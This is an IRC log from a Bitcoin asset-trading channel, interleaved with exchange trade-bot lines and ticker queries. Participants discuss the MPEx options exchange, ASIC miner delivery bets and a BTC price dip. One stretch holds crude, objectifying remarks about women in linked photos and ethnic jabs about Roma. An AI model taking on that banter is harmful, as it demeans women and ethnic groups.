[SDICE] 5 @ 0.5289 = 2.6445 BTC [-] Mar 23 04:18:58 [HAVELOCK] [VTX] 5 @ 0.5499 = 2.7495 BTC [+] Mar 23 04:22:50 jurov are you there? Mar 23 04:29:24 ThickAsThieves i'm here.. thanks to psu failure Mar 23 04:31:52 hopefully nobody noticed Mar 23 04:33:38 [MPEX] [S.MPOE] 14850 @ 0.00068249 = 10.135 BTC [-] Mar 23 04:33:44 any coinbr-ers want my referral? Mar 23 04:34:42 wish you good luck but i think it doesn't work that way xD Mar 23 04:34:58 better to lurk till someone comes and asks Mar 23 04:35:14 here, on -otc, on reddit, and else Mar 23 04:35:43 what i mean is Mar 23 04:35:46 i'm registering Mar 23 04:36:29 ah so Mar 23 04:37:00 i have an idea Mar 23 04:37:11 i'll give it to Deprived Mar 23 04:37:58 [HAVELOCK] [SDICE] 2 @ 0.528999 = 1.058 BTC [+] Mar 23 04:38:23 is he around ? or i can look up deprived's code for you? Mar 23 04:38:48 yeah you can do that Mar 23 04:38:51 i'll pm him Mar 23 04:43:59 his refcode is: 86wnxLBgte Mar 23 04:45:06 hope he won't be angry that referral credits will mess with his neat accounting :) Mar 23 04:46:22 http://www.roadfood.com/Forums/m356871-print.aspx Mar 23 04:46:28 the public is indignant. chilled salad fork!! Mar 23 04:46:33 stupid idea Mar 23 04:46:47 he can add it his ATF then Mar 23 04:46:49 :) Mar 23 04:46:54 all the money in the world Mar 23 04:47:08 and mircea_popescu spends his time browsing prole food review sites Mar 23 04:47:12 that's... Mar 23 04:47:15 a new kind of slumming. Mar 23 04:47:23 same as the old kind. Mar 23 04:47:25 actually i got that sent to me :D Mar 23 04:48:20 the whole thing is chilling Mar 23 04:50:53 apologies for blacktape noise, all Mar 23 04:50:59 [HAVELOCK] [SDICE] 1 @ 0.5289 BTC [-] Mar 23 04:51:03 but in the grand tradition of bitcoin-assets Mar 23 04:51:07 today we test in production Mar 23 04:51:20 well Mar 23 04:51:21 staging Mar 23 04:51:23 but same diff. Mar 23 04:52:59 [MPEX] [S.MPOE] 8883 @ 0.00068326 = 6.0694 BTC [+] Mar 23 04:54:40 yea. and replugging PSU's on live servers. Mar 23 04:55:16 well, all seems fine now, any other coinbr-related requests? Mar 23 04:56:34 [BTCTC] [ASICMINER-PT] 1 @ 0.8095 BTC [-] Mar 23 05:04:40 so, goodnight then Mar 23 05:04:59 nite Mar 23 05:11:25 About the AMC thing, I like the name on the invoice for their ASIC miners. Mar 23 05:11:30 [MPEX] [S.MPOE] 11421 @ 0.00068249 = 7.7947 BTC [-] Mar 23 05:11:32 [MPEX] [S.MPOE] 7414 @ 0.000675 = 5.0045 BTC [-] Mar 23 05:11:46 Ken Slaughter Mar 23 05:11:52 he's a real human Mar 23 05:12:16 http://www.linkedin.com/profile/view?id=80003437&authType=NAME_SEARCH&authToken=z8WH&locale=en_US&srchid=e8237cef-3548-4ffc-9811-1de442f6ebcb-0&srchindex=6&srchtotal=24&goback=%2Efps_PBCK_*1_Ken_Slaughter_*1_*1_*1_*1_*2_*1_Y_*1_*1_*1_false_1_R_*1_*51_*1_*51_true_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2&pvs=ps&trk=pp_profile_name_link Mar 23 05:13:02 The name is promising for investors. Mar 23 05:18:15 [BTCTC] [ASICMINER-PT] 1 @ 0.8095 BTC [-] Mar 23 05:28:58 [BTCTC] [B.YABMC] 1 @ 0.01401 BTC [-] Mar 23 05:30:07 [BTCTC] [S.MPOE-PT] 3 @ 0.000678 = 0.002 BTC [-] Mar 23 05:30:31 lol Mar 23 05:30:55 [BTCTC] [ASICMINER-PT] 6 @ 0.78211 = 4.6927 BTC [-] Mar 23 05:32:21 [MPEX] [S.MPOE] 2900 @ 0.00068326 = 1.9815 BTC [+] Mar 23 05:34:19 [BTCTC] [BITVPS] 100 @ 0.005 = 0.5 BTC [-] Mar 23 05:34:21 [BTCTC] [BITVPS] 1 @ 0.0048 BTC [-] Mar 23 05:34:23 [BTCTC] [BITVPS] 100 @ 0.004 = 0.4 BTC [-] Mar 23 05:34:25 [BTCTC] [BITVPS] 100 @ 0.003 = 0.3 BTC [-] Mar 23 05:36:58 [HAVELOCK] [VTX] 3 @ 0.5499 = 1.6497 BTC [+] Mar 23 05:41:30 wew Mar 23 05:41:47 ;;ticker Mar 23 05:41:47 BTCUSD ticker | Best bid: 68.54301, Best ask: 68.99999, Bid-ask spread: 0.45698, Last trade: 68.99999, 24 hour volume: 68403.53313381, 24 hour low: 65.00000, 24 hour high: 73.74998, 24 hour vwap: 70.35406 Mar 23 05:43:42 !ticker m ^oix Mar 23 05:43:44 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 51.16975919 / 66.68063398 / 67.41250707 (39315 shares, 9,083.51 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 23 05:44:05 i wonder. Mar 23 05:45:31 [MPEX] [S.MPOE] 4978 @ 0.00068102 = 3.3901 BTC [-] Mar 23 05:49:34 80 by next week Mar 23 05:51:22 next month 1000, two month from then, 1 000 000 Mar 23 05:51:33 exponential growth and whatnot Mar 23 05:52:11 I wonder where it would actually be if we calculated the exponential curve's formula and determined the expected price in 2 months based on that... Mar 23 05:53:01 then on month 3, 0.01 per BTC, the month after 666 per BTC Mar 23 05:53:34 at which point humanity gets diagnosed with insanity and gets locked away on a rock floating in space. Mar 23 05:53:55 [BTCTC] [ASICMINER-PT] 15 @ 0.78211 = 11.7317 BTC [-] Mar 23 06:01:08 [BTCTC] [ASICMINER-PT] 5 @ 0.78211 = 3.9106 BTC [-] Mar 23 06:01:47 (clarification notes: I'm getting tired of the price going wild) Mar 23 06:24:58 [MPEX] [S.MPOE] 18622 @ 0.00068102 = 12.682 BTC [-] Mar 23 06:25:00 [MPEX] [S.MPOE] 778 @ 0.000675 = 0.5252 BTC [-] Mar 23 06:31:26 hey guys, I'd like to learn about the leading thinkers in the BTC assets realm, and learn about the current state of the art Mar 23 06:39:21 I have a couple professors as school which I am prepared to bug about how we may build options valuation on top of BTC options Mar 23 06:40:29 but I'm actually pretty ignorant about the topic and would love to talk to someone that could help me sketch out the expected phases if a research project intending to produce option valuation model Mar 23 06:41:25 I think it may be difficult to do this absent a risk free interest rate, but I'd love to hear someone's enlightened thoughts on that Mar 23 06:45:48 Hello Mar 23 06:46:01 hey Namworld Mar 23 06:46:30 Could you give some more details about what you'd like to know exactly? Mar 23 06:49:16 mostly I'd like to hear ideas about how the design of BTC currency Options will likely proceed Mar 23 06:49:54 and to discover what my best next action should be Mar 23 06:50:30 Well there's already plenty of options for BTC Mar 23 06:50:58 I can't really see much more that what's already available. Mar 23 06:51:36 hrm, I should make it clear that I want to design valuation methods for BTC options Mar 23 06:53:06 hmm... valuation methods? In what sense? Mar 23 06:54:08 well, for example, the Black-Scholes formula tries to give a price for European-style options. Mar 23 06:55:57 [HAVELOCK] [SDICE] 4 @ 0.529 = 2.116 BTC [+] Mar 23 06:56:05 hmm... perhaps you could ask mircea. MPEx's bot happens to put bids and asks on options traded at the exchange. I am unsure how it is done. Mar 23 06:56:15 Although it's probably proprietary. Mar 23 06:56:23 and not going to be disclosed. Mar 23 06:56:31 sure Mar 23 06:57:04 sounds cool, thanks Namworld Mar 23 07:07:06 cads you can probably start by reading up on mpoe, yea. Mar 23 07:11:33 there's been ~2mn notional traded this month, should count for something. Mar 23 07:12:08 He wants to know how to valuate options tho... not an easy thing to answer Mar 23 07:13:11 indeed. Mar 23 07:14:01 Has anyone heard about the new AMC IPO on BitFunder? Curious on other folks thoughts Mar 23 07:14:14 tho what he stated was "the current state of the art". well... the current state of the art is 356`139 option contracts traded this month. Mar 23 07:14:37 Franktank i've seen some not so impressed people comment but i've not looked into it myself. Mar 23 07:15:56 [MPEX] [S.MPOE] 5000 @ 0.00067912 = 3.3956 BTC [+] Mar 23 07:15:58 [MPEX] [S.MPOE] 16808 @ 0.000675 = 11.3454 BTC [-] Mar 23 07:16:30 Ken... Slaughter... Mar 23 07:16:48 The names says it. Mar 23 07:16:51 Just saw it recently, they appear to be banking their initial revenue on incoming Avalon units (batches 2 and 3) and R&D on an ASIC chip Mar 23 07:16:53 The name* Mar 23 07:17:00 Startups appear to be the rage these days Mar 23 07:17:16 I have a hard time believe R&D part. Mar 23 07:17:22 believing* Mar 23 07:17:58 Franktank really, they do ? i've not seen a good start-up in months. Mar 23 07:18:19 or you mean, the rage as to what's a good something to pretend you're doing these days ? Mar 23 07:18:24 mircea, I am unfamiliar with mpoe. Main point of entry? Mar 23 07:19:04 http://trilema.com/2012/sa-ne-jucam-de-a-investitiile-n-bitcoini/#comment-78745 Mar 23 07:19:14 that's the charter as it were Mar 23 07:19:47 MPOE has been trading btc/usd options since august 2011, there's published monthly reports etc. Mar 23 07:20:22 remarkable! Mar 23 07:21:40 hey mircea, what's BTC like in romania? Mar 23 07:21:56 how do you mean ? Mar 23 07:22:22 well the gypsies cant get to it Mar 23 07:22:27 hehe Mar 23 07:22:34 yeah. Mar 23 07:22:38 give it a year Mar 23 07:22:58 if you think we don't have technogypsies you're wrong Mar 23 07:23:03 ;) Mar 23 07:23:03 mircea: 2mn notional of BTC? Mar 23 07:23:12 2mn notional of dollars. Mar 23 07:23:20 tho i missed a zero. Mar 23 07:23:46 ;;calc 356139 * [mtgox --last] Mar 23 07:23:47 Error: "mtgox" is not a valid command. Mar 23 07:23:51 ;;calc 356139 * [gox --last] Mar 23 07:23:52 Error: "gox" is not a valid command. Mar 23 07:23:55 da fuck is it ? Mar 23 07:24:22 ;;calc 356139 * [mt-gox --last] Mar 23 07:24:23 Error: "mt-gox" is not a valid command. Mar 23 07:24:32 :P Mar 23 07:24:39 ;;ticker Mar 23 07:24:39 BTCUSD ticker | Best bid: 68.10000, Best ask: 68.24000, Bid-ask spread: 0.14000, Last trade: 68.10000, 24 hour volume: 69191.85990614, 24 hour low: 65.00000, 24 hour high: 73.70000, 24 hour vwap: 70.19614 Mar 23 07:24:41 mircea: how safe is supercar ownership in romania? Mar 23 07:24:54 ;;calc 356139 * 68.1 Mar 23 07:24:55 24253065.9 Mar 23 07:25:08 tiberiusiv about as safe as upstate ny. Mar 23 07:25:48 mircea: so what do the girls say about a multi millionaire using 15 year old CRT monitors and staying in littered rooms? Mar 23 07:25:58 mircea_popescu: thanks for linking me to the charter Mar 23 07:26:08 tiberiusiv haha i'll have to ask i guess. Mar 23 07:26:37 am i missing eskimobob right now? Mar 23 07:27:06 you're getting old aren't you :D Mar 23 07:27:14 franktank: i thought avalon was using batch #2 money to pay for batch #1 Mar 23 07:27:18 will he show up if i say his name? Mar 23 07:27:38 and hoping profits make up the shortfall Mar 23 07:27:38 mircea_popescu: are the american romanian girls just all the pretty girls from romania, or are the girls even prettier back home? Mar 23 07:27:55 cads: most romanians immigrate to canada Mar 23 07:27:58 not US Mar 23 07:27:58 tiberiusiv amusingly, asicminer is using batch 2 chips to make up for blown batch 1 and avalon is using batch 2 money to pay for batch 1. it's like... all the same company. Mar 23 07:28:16 LOL Mar 23 07:28:18 cads eeuropean girls are pretty hot in general. Mar 23 07:28:28 tiberiusiv: this is why I always thought it strange to find myself in georgia! Mar 23 07:28:33 from poland to georgia yeah. Mar 23 07:28:38 aka red neck capital of the world Mar 23 07:28:40 girls... Mar 23 07:28:44 no comment Mar 23 07:28:47 poland is an undervalued region Mar 23 07:28:59 [MPEX] [S.MPOE] 2618 @ 0.00067092 = 1.7565 BTC [-] Mar 23 07:29:00 [MPEX] [S.MPOE] 1582 @ 0.00068326 = 1.0809 BTC [+] Mar 23 07:29:28 cads: US girls are too manly Mar 23 07:29:59 cads what school is that anyway ? Mar 23 07:30:14 tiberiusiv just bad diet for the most part. Mar 23 07:30:27 cads none of that fits EU girls? Mar 23 07:30:35 cads http://polimedia.us/dtng/c/src/135422020536.jpg which one ? Mar 23 07:31:00 mircea_popescu: oh dear jesus both please! Mar 23 07:31:03 lol Mar 23 07:31:08 cads: so you arent a neanderthal? Mar 23 07:31:11 so cads really likes sisters. Mar 23 07:31:39 mircea_popescu: they look like conjoined sisters Mar 23 07:31:49 both sprouting out of that gorgeous butt Mar 23 07:31:58 cajoled at the hyip Mar 23 07:32:16 BTC sellers becoming motivated Mar 23 07:32:25 lol the ogre girl of czech republic. Mar 23 07:32:33 one great bubblebutt, two heads, 4 tits Mar 23 07:33:45 mircea_popescu: okay, which of these 3 lovely MIT students do you choose: http://philip.greenspun.com/images/pcd2668/three-graces-straight-full-27 Mar 23 07:33:54 hahaha greenspun ? Mar 23 07:34:06 i thought im the only one that still remembers that old codger Mar 23 07:34:14 famous photography. Titled "3 Graces" Mar 23 07:34:19 they're all undergrads Mar 23 07:34:21 but none. Mar 23 07:34:26 wasn't he dating the one on the lft ? Mar 23 07:34:42 mircea_popescu: you're correct Mar 23 07:34:57 the correct answer is "I"m sorry, none of them have PhDs" Mar 23 07:35:09 what's the guy up to these days, you have him ? Mar 23 07:36:05 mircea_popescu: I only know a little lore about him - I'm not a student of MIT Mar 23 07:36:18 ah. right, you said school earlier, what school is that ? Mar 23 07:36:39 georgia state Mar 23 07:37:13 learn something every day. Mar 23 07:38:18 aye Mar 23 07:38:49 mircea_popescu, I think I must have seen your name around the BTC sites and community before today. Mar 23 07:39:01 that or you've published some paper or something Mar 23 07:39:05 it's possible. Mar 23 07:39:21 what's your academic background? Mar 23 07:39:33 philosophy/anthropology Mar 23 07:39:56 gah where's that pastie Mar 23 07:40:00 hah, a nice yet tractable jump to BTC :) Mar 23 07:40:41 my blog readers kept insisting. Mar 23 07:42:51 hey mircea, Namworld mentions that you run an automatic optinos trading bot. Would you mind attesting to the veracity of that fact? Mar 23 07:43:17 ah yes, optinos - the quantum unit of financial options. Mar 23 07:44:13 mircea_popescu: if you do not wish to mention any details about it that is perfectly fine Mar 23 07:44:32 you ever seen http://mpex.co/ ? Mar 23 07:45:13 not before right now Mar 23 07:45:42 lol ok Mar 23 07:46:42 http://thehill.com/blogs/hillicon-valley/technology/289947-republican-proposes-letting-lawmakers-work-from-home << anonymous approves. Mar 23 07:50:10 hey mircea_popescu, I just noticed the romanian version of your charter Mar 23 07:50:15 rock on! Mar 23 07:50:20 yee Mar 23 07:50:56 [HAVELOCK] [VTX] 7 @ 0.5499 = 3.8493 BTC [+] Mar 23 07:51:22 sharing is caring! Mar 23 07:51:57 [HAVELOCK] [VTX] 6 @ 0.5499 = 3.2994 BTC [+] Mar 23 07:52:57 [HAVELOCK] [VTX] 9 @ 0.55 = 4.95 BTC [+] Mar 23 07:52:59 [HAVELOCK] [VTX] 5 @ 0.55 = 2.75 BTC [+] Mar 23 07:54:41 VTX doing incredibly well I believe Mar 23 07:54:53 !ticker havelock vtc Mar 23 07:54:54 !ticker havelock vtx Mar 23 07:54:55 Yeah. No damn tobacco, that's for sure. Mar 23 07:54:56 [HAVELOCK:VTX] 1D: 0.44980000 / 0.52045992 / 0.55000000 (308 shares, 160.30165433 BTC), 7D: 0.38280000 / 0.39820061 / 0.55000000 (10343 shares, 4118.58893151 BTC), 30D: 0.38280000 / 0.39820061 / 0.55000000 (10343 shares, 4118.58893151 BTC) Mar 23 07:55:01 indeed, not bad at all. Mar 23 07:56:26 what was rthe story there, 30% sold for 5k btc ? Mar 23 07:59:37 mircea_popescu: as of this moment what I see when I look at mpex.co is a hellacious mass of legal jargon smattered with quantitative data readouts :) Mar 23 08:00:00 sounds about right. Mar 23 08:00:15 anyway, the O.BTCUSD stuff, those are all option lines Mar 23 08:00:20 I'm glad I'm not hallucinating, then. :) Mar 23 08:00:44 mpex stands as an insult to the intelligence of the average voter. Mar 23 08:03:15 mircea_popescu: oh thanks to dogs there is a faq. Mar 23 08:03:40 that won't help. Mar 23 08:03:57 [HAVELOCK] [VTX] 2 @ 0.564555 = 1.1291 BTC [+] Mar 23 08:03:58 who the fuck coded all this? Mar 23 08:04:22 evil people. Mar 23 08:04:37 I want to shake his hand and punch him at the same time Mar 23 08:04:46 no offense, if this is you Mar 23 08:04:52 I may even mean that as a compliment Mar 23 08:05:18 it's not me. Mar 23 08:05:30 a good section of tools etc were actually developed by community peeps Mar 23 08:05:54 like pympex, coinbr, there's also a windows gui and a phone one in the works Mar 23 08:06:12 therre's a creeds towards the end Mar 23 08:07:01 I can generally eventually converge on an understanding of technojargon, even without help Mar 23 08:07:19 but it usually requires a few in depth readings, and some secondary reference material Mar 23 08:07:46 right now I'm not reading anything technical with the intention of trying to understand it :) Mar 23 08:08:08 well, you can go through the MPEx category on trilema, there's a lot of stuff there Mar 23 08:08:10 also a lot of fluff Mar 23 08:08:20 so mpex is a software framework for deploying exchanges Mar 23 08:08:34 no, it's an exchange. Mar 23 08:08:36 options exchanges* Mar 23 08:08:42 S.* are equities. Mar 23 08:08:47 X.* are futures Mar 23 08:10:32 mircea_popescu: do we still have to pay 30 BTC in fees for account registration? Mar 23 08:10:49 http://mpex.co/faq.html#3 Mar 23 08:10:58 yes. Mar 23 08:12:50 and the investors can justify this cost in expected revenue? Mar 23 08:13:25 it is deep. Mar 23 08:13:31 anyway, mpex is bitcoin's nyse Mar 23 08:13:41 average investors are not expected to buy themselves a seat at the exchange Mar 23 08:13:48 and most wouldn't know what to do with it if they had it. Mar 23 08:14:25 but, for high volume or sophisticated peeps it's a nice perk. Mar 23 08:14:33 can I learn what investors at the exchange do? Mar 23 08:14:36 I already paid the cost of the seat plenty Mar 23 08:14:43 cads they issue orders Mar 23 08:14:54 trade shares, mostly Mar 23 08:15:43 but anyway, since option stuff was your main interest, read up on the oix Mar 23 08:15:47 ;;g mpex oix Mar 23 08:15:48 Error: "g" is not a valid command. Mar 23 08:15:52 ;;google mpex oix Mar 23 08:15:53 MPEx, the Bitcoin securities exchange.: ; o.btcusd.c290n - MPEx, the Bitcoin securities exchange.: ; nat.routers - MPEx, the Bitcoin securities exchange.: Mar 23 08:15:58 and what must they do, from a decision making standpoint - average investors make decisions based on gut. Do these investors use quant as well? Mar 23 08:16:00 jesus that's useless. Mar 23 08:16:20 http://trilema.com/2013/introducing-the-oix/ there Mar 23 08:16:39 they mustn't do anything. they do what they please,. buy, sell , whatever Mar 23 08:17:58 I mean only that it seems they must guarantee that their decisions are of high quality Mar 23 08:18:22 or else they risk wasting the sizeable initial fee Mar 23 08:18:52 i don't follow the logic Mar 23 08:19:03 and am wondering what additional decision making measures these investors generally adopt, above and beyond basic investment strategies Mar 23 08:19:25 there was a 10k btc buy of S.DICE in one go at some point. Mar 23 08:19:37 the fee hardly figures in this discussion Mar 23 08:19:40 do investors in mpex generally pay their own analysts, for example? Mar 23 08:19:51 i would imagine some do Mar 23 08:19:59 probably most do at least some themselves. Mar 23 08:21:53 since I'm most interested in options, and since these traditionally have theory, I'm now wondering if any of these guys have paid analysts to derive appropriatate new pricing models for these options Mar 23 08:22:11 mircea_popescu: what type of option is traded on the mpex? Mar 23 08:22:27 american settled on last friday of each month Mar 23 08:22:31 T is current N is next month Mar 23 08:25:38 mircea_popescu: how much money is good enough to play? Mar 23 08:25:47 "if you have to ask...." Mar 23 08:26:02 last calculation i recall something like 2k btc total trade volume justifies the fee Mar 23 08:26:36 you know it occurs to me... when new person takes an hour just to gaze at the edges of this thing... Mar 23 08:26:40 you know you've built something. Mar 23 08:26:51 mircea_popescu: so I could work with a 500 BTC base an recoup the entry cost over a handful of months? Mar 23 08:27:12 mircea_popescu: haha, what a very romanian sentiment :) Mar 23 08:27:17 is it ? Mar 23 08:27:41 anyway, mpex charges .2% seller only. if you make .5 round trip then .3 difference will yiueld 30 btc over 10k traded. Mar 23 08:28:20 but this is just a sidepoint. if you're looking to invest btc what are you going to do ? Mar 23 08:29:01 ;;ticker Mar 23 08:29:02 BTCUSD ticker | Best bid: 67.11000, Best ask: 67.29998, Bid-ask spread: 0.18998, Last trade: 67.29998, 24 hour volume: 67513.96570233, 24 hour low: 65.00000, 24 hour high: 73.69900, 24 hour vwap: 69.98189 Mar 23 08:29:08 ouch Mar 23 08:29:09 o we shed a dolla ? Mar 23 08:29:13 was 68.1 an ghour ago Mar 23 08:31:09 mircea_popescu: at this point I'd like only to understand how to imagine, visualize, and refine an mpex investment strategy Mar 23 08:31:17 mircea_popescu: do you play chess? Mar 23 08:31:23 sometimes yea Mar 23 08:31:46 anyway, btc investment strategies are an intellectual contribution Mar 23 08:31:55 [HAVELOCK] [VTX] 1 @ 0.571002 BTC [+] Mar 23 08:32:00 the thing is new, price data extends little in the past, there's a lot of weirdness in the market Mar 23 08:32:11 so the more people thinking about it the better, a fertile field as it's called. Mar 23 08:32:38 certainly the best phds of the future will b done on bitcoin/mpex/whatever Mar 23 08:35:19 mircea_popescu: I see it as a low entry cost into a promising finance research field Mar 23 08:35:19 mircea_popescu: yeah, even if mpex and btc are superseded, what agents learn about this market will be valuable in the future Mar 23 08:36:01 it certainly used to be very low cost Mar 23 08:36:13 with the current run up i'm not sure i'd call it low cost, but it IS moderate Mar 23 08:36:25 especially considering what training traders costs on the fiat markets. Mar 23 08:36:50 mircea_popescu: at least I will not be competing with well established finance phds already working in the field :) Mar 23 08:37:04 I can turn this into a virtual finance university in time Mar 23 08:37:34 you will be. Mar 23 08:37:40 using BTC and its derivatives as the lesson ground and the tournament ground for the students Mar 23 08:37:54 i would guess about a third of the best minds of this generation are more or less discreetly circling the matter. Mar 23 08:38:49 even leaving aside the conference trail clowns, the ideological types and all the geek weirdoes, Mar 23 08:38:53 it still leaves a lot of people Mar 23 08:38:59 well I'd better know how to speak bitcoin before the hiring managers at large hedge funds realize it :) Mar 23 08:39:16 certainly will be a career, no doubt in my mind. Mar 23 08:39:31 even tiny minute things done in five minutes today will be a career down the road. Mar 23 08:39:42 and mpex is all about creating a market and bulding an ecosystem, so. Mar 23 08:39:48 this will be pushed forward. Mar 23 08:40:07 I think it will determine the long term fate of the btc Mar 23 08:41:05 yeah. Mar 23 08:41:27 in the sense that derivatives is what will give BTC the depth and complexity needed to take on the real world Mar 23 08:41:37 where's that arms quote Mar 23 08:41:58 {mircea_popescu} people don’t understand many things, chief among which that the world is at war, and finance is the means of that war. Mar 23 08:41:58 {mircea_popescu} mpex is here to arm bitcoin with all the high impact high efficiency weapons fiat currencies have. Mar 23 08:41:59 there. Mar 23 08:42:17 bam Mar 23 08:42:26 effective metaphor Mar 23 08:46:30 hey mp, some people are bitching that they bet on the Avalon bet Mar 23 08:46:36 because they thought it includes batch 2 Mar 23 08:46:49 well... some people will always bitch about something Mar 23 08:47:41 so its locked in then Mar 23 08:47:41 lol Mar 23 08:48:03 they think they;ll win by technicality since at the time, batch 2 was included Mar 23 08:48:30 yeah well, people thinking they'll leech everyone else don't historically do so well on bitbet Mar 23 08:48:41 there were people who waited for btc/usd to be 49.99 before betting Mar 23 08:48:48 some plan to design a building for someone Mar 23 08:48:49 only to discover that no, bitcoin is not instantaneous Mar 23 08:49:54 Am I wrong by saying it looks like the market has peaked and is now heading downward? Mar 23 08:50:00 mt gox Mar 23 08:50:01 http://store.avalon-asics.com/ Mar 23 08:50:10 KRS1: not even wrong :) Mar 23 08:50:13 cads someone's sorta-playing with making a hm Mar 23 08:50:26 what's that virtual reality game ? not second life, the other one Mar 23 08:50:30 the one with the bricks and hats Mar 23 08:50:30 hm? Mar 23 08:50:39 tf2? Mar 23 08:50:41 ya Mar 23 08:50:44 a tf2 mpex Mar 23 08:50:45 what about it Mar 23 08:50:57 i have 1800 hrs clocked in that game Mar 23 08:51:16 that sounds like a lot. Mar 23 08:51:19 yeah, games are nice, but trade center plans are nicer Mar 23 08:51:33 yah Mar 23 08:51:36 KRS1 looks pretty likely yea Mar 23 08:51:42 well, half of it is probably done through trading Mar 23 08:51:45 despite not being... entirely needed at the time Mar 23 08:51:46 and idling Mar 23 08:51:54 and avalon released batch 3 already Mar 23 08:52:06 thx Mar 23 08:52:21 it had to peak out eventually. Mar 23 08:52:25 75ish is honorable. Mar 23 08:52:36 KRS1: aww that's cute how you treat mircea_popescu as the BTC godfather Mar 23 08:52:58 Is it really peaking tho? It's weekend and price seems to be holding Mar 23 08:53:08 weekend dip Mar 23 08:53:09 Namworld well... we won't know till next week Mar 23 08:53:11 *yawn Mar 23 08:53:20 I can't wait to see Mar 23 08:53:29 I'd really like to see the 100 breached. Mar 23 08:53:33 but beart in mind, 2 consecutive red days Mar 23 08:53:36 first time this rally. Mar 23 08:53:40 That would be newsworthy Mar 23 08:53:48 I treaded mircea_popescu how? Mar 23 08:53:58 Yeah, well it's got to be losing steam by now Mar 23 08:54:07 Avalon seemed to have raied their prices? Mar 23 08:54:15 yea. Mar 23 08:54:24 KRS1: hehe, no worries, it was just some meaningless teasing Mar 23 08:54:29 [MPEX] [S.MPOE] 8150 @ 0.00067526 = 5.5034 BTC [-] Mar 23 08:54:48 its based on btc now Mar 23 08:55:16 tbh, from a macro perspective 100+ is prolly too much. Mar 23 08:55:28 there's such a thing as too much attention, and so forth Mar 23 08:55:41 You are showing your outward anger because you know you make close to no sense. If anything, this statement is worded vaguely enough that it should be considered a bad bet. The bottom line is that if you go by the betting statement wording and the dates, there are two batches under pre-order. Good attempt to sway betting action by writing a ridiculously vague statement, though. Read the betting statement word for word as it's Mar 23 08:55:52 http://bitbet.us/bet/269/avalon-will-deliver-asic-devices-before-april-1st/ Mar 23 08:56:02 Bah, idk about those butthurt trolls Mar 23 08:56:07 your call mp Mar 23 08:56:19 there's a site mod team, what. Mar 23 08:56:22 theyll figure it out Mar 23 08:56:29 ah Mar 23 08:59:44 cads: thats cool idk what you meant ..its all good..just came in for some mt gox market wisdom wanted to sell btc before the market dips as all markets do Mar 23 08:59:46 https://twitter.com/Mircea_Popescu/status/315357147934375936 Mar 23 09:00:13 me helping out "coding entrepreneurs", whatever the fuck that is now. Mar 23 09:00:15 "executive geek" Mar 23 09:01:15 "jQuery rockstar" Mar 23 09:01:33 right Mar 23 09:01:40 "pillow girlfriend" Mar 23 09:02:11 im still waiting for my BFL SC I ordered in Aug. anyone know anything about that? Mar 23 09:02:28 o boy. Mar 23 09:02:36 we hit 66 Mar 23 09:02:38 seems like that's a write-off, KRS1 Mar 23 09:02:38 ;;ticker Mar 23 09:02:39 BTCUSD ticker | Best bid: 66.66000, Best ask: 66.99995, Bid-ask spread: 0.33995, Last trade: 66.99997, 24 hour volume: 65609.91092104, 24 hour low: 65.00000, 24 hour high: 73.69900, 24 hour vwap: 69.91589 Mar 23 09:02:44 66.66 no less. Mar 23 09:02:44 number of the beast Mar 23 09:02:52 with an extra 6 Mar 23 09:03:03 i was wobbed huh Mar 23 09:03:23 KRS1 http://trilema.com/2013/preemptive-strike-to-have-on-hand-for-when-butterfly-labs-gets-hauled-off-to-jail-in-corpore/ Mar 23 09:03:27 wonder if it's because it's real hard to buy btc right now Mar 23 09:03:29 great.. Mar 23 09:03:33 this sucks for people who bought in at 75 Mar 23 09:03:46 my friend has some actual BFL hardware but not ASIC Mar 23 09:04:28 TradeFortress_ i think it's safe to blame the entire coin* fiasco for it. Mar 23 09:04:36 not terribly accurate, but still, safe. Mar 23 09:04:40 Wow thanks for sharing Mar 23 09:04:41 and bitinstant too Mar 23 09:05:14 prolly. Mar 23 09:05:41 [MPEX] [S.MPOE] 5400 @ 0.00068407 = 3.694 BTC [+] Mar 23 09:06:00 the truely funny thing here, and this is a shoutout for all my conspiracy dawgs, Mar 23 09:06:11 is that btc peaked at 75, JUST AS S.DICE. Mar 23 09:06:14 which also peaked at 75 Mar 23 09:06:25 clearly manipulated matkets. Mar 23 09:15:39 ;;ticker Mar 23 09:15:40 BTCUSD ticker | Best bid: 66.00001, Best ask: 66.30000, Bid-ask spread: 0.29999, Last trade: 66.30000, 24 hour volume: 66468.13921981, 24 hour low: 65.00000, 24 hour high: 73.69900, 24 hour vwap: 69.81931 Mar 23 09:15:49 this selloff Mar 23 09:17:16 The day is not completed however. It may still be green by the end of the day. Mar 23 09:17:46 http://coinlab.com/ Mar 23 09:17:51 I see dump after dump Mar 23 09:18:14 The previous dip on the 12th before the 50 wall was broken was more massive for a lower value. Mar 23 09:18:22 Proportionally it was much bigger. Mar 23 09:19:26 $65.85 Mar 23 09:19:45 and the graph shows a lot of fluctuation. It even shows lower some time ago Mar 23 09:20:09 We were slighlty under 65 some time ago on coinlab and it popped back to 70... Mar 23 09:20:40 i bet lucif is partying right now, saying he called this from 3 months ago Mar 23 09:20:47 We might fluctuate back and forth at the 75 wall until it breaks or buyers get tired. Mar 23 09:24:01 [BTCTC] [BASIC-MINING] 1 @ 0.33002 BTC [-] Mar 23 09:24:05 Wow, this is a rush. Mar 23 09:24:16 How low can she go? Mar 23 09:25:07 [BTCTC] [ASICMINER-PT] 1 @ 0.80946 BTC [+] Mar 23 09:25:50 so what w're seeing right now is essentially a random walk Mar 23 09:26:09 cads : http://live.coinbr.com/?mpsic=S.MPOE Mar 23 09:26:11 select 1 month Mar 23 09:26:11 but we might attempt to compute its derivative to see in which direction it's walking? Mar 23 09:26:57 evertythin's a drunken stumbler Mar 23 09:27:31 [BTCTC] [ASICMINER-PT] 2 @ 0.80946 = 1.6189 BTC [+] Mar 23 09:28:34 just bet 10 btc on bfl not shipping before apr 1st Mar 23 09:28:37 free coins Mar 23 09:28:55 ;;ticker Mar 23 09:28:55 is that still open ? Mar 23 09:28:56 BTCUSD ticker | Best bid: 63.59807, Best ask: 64.46880, Bid-ask spread: 0.87073, Last trade: 62.28200, 24 hour volume: 68148.80678210, 24 hour low: 65.00000, 24 hour high: 73.69900, 24 hour vwap: 69.72187 Mar 23 09:29:03 wow Mar 23 09:29:13 [BTCTC] [GSDPT] 8 @ 0.0046 = 0.0368 BTC [-] Mar 23 09:29:16 LTC on the other hand Mar 23 09:29:19 yes, 263 to 65 Mar 23 09:29:38 